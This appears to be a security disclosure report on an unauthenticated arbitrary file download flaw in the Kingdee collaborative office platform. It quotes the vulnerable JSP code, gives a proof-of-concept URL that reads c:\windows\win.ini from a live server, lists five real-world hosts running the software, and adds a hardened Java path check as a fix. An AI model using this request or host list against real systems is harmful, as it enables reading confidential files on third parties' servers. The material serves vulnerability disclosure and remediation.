### Summary: Kingdee Collaborative Office Platform arbitrary file download vulnerability (no login required)

### Details:

Testing shows that this system allows arbitrary file download, and no login is required.

The vulnerable file:

```
/oa/admin/application/file_download.jsp?filePath=
```

Part of the vulnerable code:

```
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%
// All three values are taken straight from the request; filePath is used unchanged as a filesystem path.
String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
java.io.OutputStream ou = null;
java.io.InputStream is = null;
try{
    // No authentication check and no restriction on the directory the path may point to.
    java.io.File logFile = new java.io.File(logPath);
    if (logFile.exists()) {
        is = new java.io.FileInputStream(logPath);
        byte[] content = new byte[1024];
        int i = 0;
        // The content type and the download file name are also client-controlled.
        response.setContentType(contentType);
        ou = response.getOutputStream();
        response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\"");
        while ((i = is.read(content)) != -1) {
            ou.write(content, 0, i);
        }
        ou.flush();
    } else {
        // The requested path is echoed back, so a non-existent file still confirms path handling.
        out.println("file not found:"+logPath);
    }
} catch (Exception e) {
    System.out.println(e);
} finally {
    if (ou != null) ou.close();
    if (is != null) is.close();
}
%>
```

This is an obvious arbitrary file download vulnerability. Taking a random instance from the internet as proof:

```
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini
```

Visiting the URL directly downloads the file, which is saved under the name file.txt.

![1.png](https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png)

5 cases:

```
http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp
```

### Proof of vulnerability:

The downloaded file is shown in the screenshot above.
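As an added example (not code from the report or from the Kingdee product), a hardened replacement for the path handling shown above, written in Java: the client supplies only a relative name, which is resolved inside a fixed base directory and rejected if it is absolute, escapes the directory after normalization, or resolves through a symlink to somewhere else. The base directory path, the class and the method name are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

/** Hardened path handling for a file-download endpoint (added example, not the product's code). */
public final class SafeDownload {
    // Assumption: downloads are confined to this directory; the report names no such setting.
    private static final Path BASE_DIR =
            Paths.get("/var/kingdeeoa/downloads").toAbsolutePath().normalize();

    /**
     * Maps a client-supplied relative name to a file inside BASE_DIR.
     * Returns null (the caller answers 400/404 without echoing the input) when the input is
     * empty, absolute, contains NUL, escapes BASE_DIR after normalization or symlink
     * resolution, or is not a regular file.
     */
    public static Path resolveDownload(String requested) {
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            return null;
        }
        Path rel;
        try {
            rel = Paths.get(requested);
        } catch (InvalidPathException e) {
            return null;                  // characters the host filesystem rejects
        }
        if (rel.isAbsolute()) {
            return null;                  // e.g. "c:\windows\win.ini" as used in the report
        }
        // Collapse "../" segments, then require the result to stay under BASE_DIR.
        Path target = BASE_DIR.resolve(rel).normalize();
        if (!target.startsWith(BASE_DIR)) {
            return null;                  // traversal out of the base directory
        }
        try {
            // Follow symlinks and check again: a link inside BASE_DIR may point outside it.
            Path baseReal = BASE_DIR.toRealPath();
            Path real = target.toRealPath();
            if (!real.startsWith(baseReal) || !Files.isRegularFile(real)) {
                return null;
            }
            return real;
        } catch (IOException e) {
            return null;                  // missing file: no "file not found:<path>" echo
        }
    }
}
```

The `contentType` and `fileName` parameters in the original are still reflected into response headers and need the same treatment (a fixed content type and a sanitized file name), which this example leaves out; an authentication check in front of the endpoint is also still required.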